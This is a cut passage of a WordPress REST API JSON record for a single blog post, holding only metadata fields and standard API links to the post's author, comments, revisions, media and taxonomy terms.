[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[12],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/148"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=148"}],"version-history":[{"count":16,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/148\/revisions"}],"predecessor-version":[{"id":346,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/148\/revisions\/346"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=148"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=148"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}